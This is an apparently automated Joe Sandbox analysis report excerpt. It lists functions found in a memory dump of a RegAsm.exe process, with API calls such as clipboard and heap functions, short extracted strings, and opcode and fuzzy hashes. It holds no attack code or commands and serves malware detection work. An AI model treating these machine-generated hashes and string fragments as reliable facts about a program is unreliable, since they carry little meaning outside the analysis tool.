                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438218
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                • Opcode ID: 963df09372b50f607ed52231854c4d59acc99289afda96f9f19167c0996b0e99
                                                                                                                                                                                                                • Instruction ID: 210aa2dafe0433a51058e8b7290a016339c139d8b012400ed691351da44ce6b3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 963df09372b50f607ed52231854c4d59acc99289afda96f9f19167c0996b0e99
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DB092322802045AE9001B48BC05BA4B718EB8066BF200072EA0C880A2D113997A96A8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: $ $ $ $ $ $ $-$.$0123456789ABCDEFXP$0123456789abcdefxp$@$A$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                • API String ID: 0-1406891699
                                                                                                                                                                                                                • Opcode ID: 5fe6e12a2638e5e605a89a1e74ce025d297c4aa3b5c22920f4a89750c369ff99
                                                                                                                                                                                                                • Instruction ID: 487080ebca6db4a2f4a63b791c6092a307c28b1da33addde68164491a41eba4e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fe6e12a2638e5e605a89a1e74ce025d297c4aa3b5c22920f4a89750c369ff99
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAE2F1716083418FC718CF28C49462BBBE2ABD5314F18867EE895AB3D1D779DD06CB86
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: ,$.$0$0$0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
                                                                                                                                                                                                                • API String ID: 0-592371532
                                                                                                                                                                                                                • Opcode ID: 7cbe558533fb7ae0152581f9e816e16b4e27f59ca6ce2b0f46bc5befc4961d0b
                                                                                                                                                                                                                • Instruction ID: f632d19e1011d4e84aad26c661c6e5d435a4fac7925595ca077130d337c29d85
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cbe558533fb7ae0152581f9e816e16b4e27f59ca6ce2b0f46bc5befc4961d0b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B72E3756093418FD314CE28C58475BBBE1BBC5304F188A7EE89AA73D1D3B9DD058B8A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: 01$F}w$RZB$XZB$ps$xZB$}z{x
                                                                                                                                                                                                                • API String ID: 0-2234522390
                                                                                                                                                                                                                • Opcode ID: 46b6d3e947f041b38adcfd8ca33e6657c97d90b68ebb27657bc05c9d464e549c
                                                                                                                                                                                                                • Instruction ID: 7c75d544a8c29c11e0f6f274e536c446b85ab27432b89beb213d306bd112cb90
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46b6d3e947f041b38adcfd8ca33e6657c97d90b68ebb27657bc05c9d464e549c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBF145B1A183508FD3208F65E88576BBBE1FBC6318F498A2DE4D49B351D7788805CB97
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: !Y)[$(],_$5M0O$7E9G$9Q>S$a%a'$}z{x$}z{x
                                                                                                                                                                                                                • API String ID: 0-3640916644
                                                                                                                                                                                                                • Opcode ID: b97c1ed88e3d31725ddd3fb39334953d3a5a36b18cccd788339356fcf47fbaec
                                                                                                                                                                                                                • Instruction ID: 8038b8fc89dd961067976e9b5db2b0514576f957f4e335a3c0ff1a04589f3cd3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b97c1ed88e3d31725ddd3fb39334953d3a5a36b18cccd788339356fcf47fbaec
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75F1E0B9608350DFE3148F25E88176BBBE2FBC6308F55992DE5C48B351D7789806CB46
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Clipboard$DataGlobalLockLongOpenWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2401467216-0
                                                                                                                                                                                                                • Opcode ID: 80ae8dc8c6d18b1cee28cd6ec83ed87ed6a750223610910af8073deb50422026
                                                                                                                                                                                                                • Instruction ID: 9f61a7f57793e4596e5270650fb0acd557b46b5302941234fdd1030700afe210
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80ae8dc8c6d18b1cee28cd6ec83ed87ed6a750223610910af8073deb50422026
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9051F3B18087918FE710AF7C9849359BFA0AF0A320F04873EE4A5972C6D3389915C7DB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: .]z[$7Y+W$9A-_$O1nO$\9Y7
                                                                                                                                                                                                                • API String ID: 0-3103464985
                                                                                                                                                                                                                • Opcode ID: 1d7e6db69ed658b59888eda7bcc29677fade6b36f2f0ccfe7b9835da22dba30b
                                                                                                                                                                                                                • Instruction ID: 0b6c74c9a379bff11fef6752102846e2e17ce21d8912ff1bac0dfa61de8bd882
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d7e6db69ed658b59888eda7bcc29677fade6b36f2f0ccfe7b9835da22dba30b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E61F472908361CBC714CF25DC812ABBBB1EF91748F18856DE4C45B351E339D946CB96
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: .]z[$7Y+W$9A-_$O1nO$\9Y7
                                                                                                                                                                                                                • API String ID: 0-3103464985
                                                                                                                                                                                                                • Opcode ID: 4cf5652ecf1bc13ba8969e941ffec233667405590163c8fd6cf79d4d2287ef0f
                                                                                                                                                                                                                • Instruction ID: 33433c1cf5a6180f53deb35bc3d05ad82548ba427fd27d41d3c12cab20251898
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cf5652ecf1bc13ba8969e941ffec233667405590163c8fd6cf79d4d2287ef0f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C610572908361CBC7148F25DC812ABBBB2EFD1744F18896DE8C45B351E339D946CB96
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                • Opcode ID: 848ca4ac9c7c9123e47ac06bf2781841a63368e1a9ee2891494c07c3ac6088da
                                                                                                                                                                                                                • Instruction ID: fbbce7ad633b07f750d1d39319c3832ca9b6930809a03d8f12be590156538362
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 848ca4ac9c7c9123e47ac06bf2781841a63368e1a9ee2891494c07c3ac6088da
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77A14CB040D3818BE370DF54C58879BBAE0BB85308F508D2EE5994B350DBB9594ACF97
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: )$)$IEND
                                                                                                                                                                                                                • API String ID: 0-588110143
                                                                                                                                                                                                                • Opcode ID: c5c8fa8975e90c00b6fff2f16777a39e1fc21c1793c43ec1ac37d209ff79c10b
                                                                                                                                                                                                                • Instruction ID: 3fe9b987952ccde178efa9f1f1c00db419640494b095269c1b53dd01ec44560a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5c8fa8975e90c00b6fff2f16777a39e1fc21c1793c43ec1ac37d209ff79c10b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9E1B071A087019FE310DF28C88571ABBE0BB94314F14463EE999A73D1DB79E915CBCA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: ()$0$2
                                                                                                                                                                                                                • API String ID: 0-2766669394
                                                                                                                                                                                                                • Opcode ID: b431683c6e682e94ca6e93cbb4d2751a54d99ebcda0fd91457817300398900ae
                                                                                                                                                                                                                • Instruction ID: 866e2b648f7bcc383e22ba6bbda90a5c047cd05d48a8e8d2e44f1a1a3b7545c2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b431683c6e682e94ca6e93cbb4d2751a54d99ebcda0fd91457817300398900ae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1CC1D47050C3805BD324CF29D45036BBBE2ABD2358F18897DE4D59B792D779884ACB86
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: Zly$yt/$yt/
                                                                                                                                                                                                                • API String ID: 0-753245582
                                                                                                                                                                                                                • Opcode ID: 6d50fe596ce45943e37491d3dc783259b6d4f02450cd38f04fe773c11fcd919d
                                                                                                                                                                                                                • Instruction ID: 43c425d19c7a5dd9d2b0e9e6ee396766c4f387a1a8bde8379edbf945f8c64b42
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d50fe596ce45943e37491d3dc783259b6d4f02450cd38f04fe773c11fcd919d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C41DD75A5929A8BCB18CF25C8D1677B7B1FF45301B08A49DC841AF39ADB38D90287D8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                • String ID: v
                                                                                                                                                                                                                • API String ID: 3664257935-704655076
                                                                                                                                                                                                                • Opcode ID: 1431d6d7878cf9ae64f9511afd6a5dfb7ec890bf9ec57de7d701933aa395053b
                                                                                                                                                                                                                • Instruction ID: d6aa1a83b84c1add582603f22629dbbc92b886d6759163826391720d4c9d0c94
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1431d6d7878cf9ae64f9511afd6a5dfb7ec890bf9ec57de7d701933aa395053b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BB1F270604B418BD324CF29D891BA3BBE2EF61304F188B6DD4D74B786D739A409CBA5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Uninitialize
                                                                                                                                                                                                                • String ID: -4
                                                                                                                                                                                                                • API String ID: 3861434553-3249790742
                                                                                                                                                                                                                • Opcode ID: c1f68f55d8e8b98da7a8dc8f71a31de373854987414512868f1acd656190aac3
                                                                                                                                                                                                                • Instruction ID: ee78c7d0252da59181078afd55f973ef8b1dab3207e3fec2bebd3f090d2a1d50
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1f68f55d8e8b98da7a8dc8f71a31de373854987414512868f1acd656190aac3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44C01238A180008B86088F20AC80139B27AAB8F20AB50A42AC01B6B222C274D442860C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: #$n'B!
                                                                                                                                                                                                                • API String ID: 0-2406872370
                                                                                                                                                                                                                • Opcode ID: 7520753a4ec4cd0a9bc0959d14932fcb5a92b39f3286b2a0234cb41b6301714d
                                                                                                                                                                                                                • Instruction ID: 5532e4a095cd03926b6754af58d78df9e487e896dc0285bec9cc4d8b2487c21a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7520753a4ec4cd0a9bc0959d14932fcb5a92b39f3286b2a0234cb41b6301714d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87D1E33B619212CBCB18AF28DC6226E73E2FF8A745F0BC47DD4458B2A0DB39C9508715
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: 0123456789ABCDEFXP$0123456789abcdefxp
                                                                                                                                                                                                                • API String ID: 0-595753566
                                                                                                                                                                                                                • Opcode ID: 42d60f80324c95ef2fd19c79e7edbe83cd68dcc0952184340a40a4c4267bc099
                                                                                                                                                                                                                • Instruction ID: 7f83093fdfa886b29f6d75bb5a23efdcf0648f8279e69ff4650518dc13d16477
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42d60f80324c95ef2fd19c79e7edbe83cd68dcc0952184340a40a4c4267bc099
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C91D031A083418FD714CE29858426FBBE2AFD5314F18893EE999A73D1D7B9D8058B86
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: (%B$8;
                                                                                                                                                                                                                • API String ID: 0-4224822745
                                                                                                                                                                                                                • Opcode ID: 09320fb1d3c6f781c7cacccaeb59ea437963b0392f48d3700f9295a67b0dac14
                                                                                                                                                                                                                • Instruction ID: 15796580c29967bb32aad8ccaafd6f2d70c8bb1af74f69c98818116406b814ad
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09320fb1d3c6f781c7cacccaeb59ea437963b0392f48d3700f9295a67b0dac14
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7510FB4D01358ABDB24DFA8DD467DDBF71AB45314F148269E8A8AF2C4C7740849CF82
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoCreateInstance.OLE32(004429E8,00000000,00000001,004429D8), ref: 00420779
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 542301482-0
                                                                                                                                                                                                                • Opcode ID: be24353db708b4d4229f611224b2503b48cdc3e675f6940a93d0eb48f37539d0
                                                                                                                                                                                                                • Instruction ID: 1c2bdeb94b5ba208a473908e2a6b5b722f931ee80727048f906afae43ab012e8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: be24353db708b4d4229f611224b2503b48cdc3e675f6940a93d0eb48f37539d0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D51BFB17002149BEB20AB24DC86B6773E4FF81768F444519F945CB392F778E944C76A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: uGB
                                                                                                                                                                                                                • API String ID: 0-2324794071
                                                                                                                                                                                                                • Opcode ID: 68350e04edb8994292c73e659ee0932605d97a3757c80ad15aa4df2cdd48ab27
                                                                                                                                                                                                                • Instruction ID: 2a71fa99091e37d9177ca987b451bb93aff07835325b93aa89a7059f1b3a62ac
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68350e04edb8994292c73e659ee0932605d97a3757c80ad15aa4df2cdd48ab27
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2519836B483618FD320CB28E880267B7D2DFE6351F89826AD6D40B395D73DC809D796
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: FBMx
                                                                                                                                                                                                                • API String ID: 0-4146874645
                                                                                                                                                                                                                • Opcode ID: 627c668ffd5578d6f69c1d59d95a7d1d0a0dd731a6eecbf54792d5d288648191
                                                                                                                                                                                                                • Instruction ID: 7c2b547654936a7a8f8319ef14b82db5565c025c677c9e25f718dfa35f60652f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 627c668ffd5578d6f69c1d59d95a7d1d0a0dd731a6eecbf54792d5d288648191
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D41EA706087908FD3268F3594A07B3BBE1AF67305F18549EE0EB47342D3796806C769
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: -4
                                                                                                                                                                                                                • API String ID: 0-3249790742
                                                                                                                                                                                                                • Opcode ID: 596707033267d9f0075936f7d922f85c011da0fad181471914a88865c22f02eb
                                                                                                                                                                                                                • Instruction ID: 8aca84e40545209fdb2d8b35976cefb1c594da7aa5ff0c97ffd916c953638cdc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 596707033267d9f0075936f7d922f85c011da0fad181471914a88865c22f02eb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6415B3662931057C32C8F68C89256BB792EF95308F19923FDD4A172A1DB799C418BCD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: e'B
                                                                                                                                                                                                                • API String ID: 0-4081730048
                                                                                                                                                                                                                • Opcode ID: f8bcc63f0ceab1b701462bee6b30f7fdc221c3d6f40941c20e6d34de46b65af5
                                                                                                                                                                                                                • Instruction ID: e7ee576ed9efd2e9c3c389938149e6a68afe3f75d82ce871b0330f4537dd6204
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8bcc63f0ceab1b701462bee6b30f7fdc221c3d6f40941c20e6d34de46b65af5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2631C3B9B182118FCB18CF28DC8596B37B3EF86342B59D47AD011DB261EB3C8901CB48
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: }z{x
                                                                                                                                                                                                                • API String ID: 0-1935807464
                                                                                                                                                                                                                • Opcode ID: 11b82ecff260dc885fc27bdf2763858f5819e35cf34130d77cc39d8bd48c8a86
                                                                                                                                                                                                                • Instruction ID: c2fe4bd197b3f8940e13c4d42f8ccc48d4f2f790a7f62d3db4fbfa854d76f439
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11b82ecff260dc885fc27bdf2763858f5819e35cf34130d77cc39d8bd48c8a86
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C318D70A043017BE6109B15CC81B3B77A9DF9970CF01A53EFD9597252E239DC05C26E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: LO
                                                                                                                                                                                                                • API String ID: 0-4218834679
                                                                                                                                                                                                                • Opcode ID: 75a8acb2736b9bbca07126e771eacac5bc987dee8e051a9f25db1d155e375cd3
                                                                                                                                                                                                                • Instruction ID: 316a0c713d8ec889d0f2383d5a3762abcadb3709da7811cf17198a4df97889c8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75a8acb2736b9bbca07126e771eacac5bc987dee8e051a9f25db1d155e375cd3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3210572A483505FC324CF28CCC131BBAE1ABD6218F159A3DF5E5D77D5D67988008786
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: }z{x
                                                                                                                                                                                                                • API String ID: 0-1935807464
                                                                                                                                                                                                                • Opcode ID: c5e1ba8d5768a3735c12b02acaad27576671a453925e0dc8b78d7f7701e76775
                                                                                                                                                                                                                • Instruction ID: 7a1b2fdff1fca2a0268dad40c3110e9638c419b9d121008f2e3427452ec6be7a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5e1ba8d5768a3735c12b02acaad27576671a453925e0dc8b78d7f7701e76775
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 320100346093088FC3149B24E890B3BBBB2EB63344F50586DE0A08B262C339CC168B4A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: fa2356303a2ae905909117f82a7795db23c925d4aeb5962e10336c2a7c82ca01
                                                                                                                                                                                                                • Instruction ID: 64d6ff258e70e9ab58b699059f502ec1843e9dc0696fdec6636c7144f00a226f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa2356303a2ae905909117f82a7795db23c925d4aeb5962e10336c2a7c82ca01
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03F10436A18211DFD708DF28DC9172AB3E2FF8A311F0A857DD945972A1D778E811CB86
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
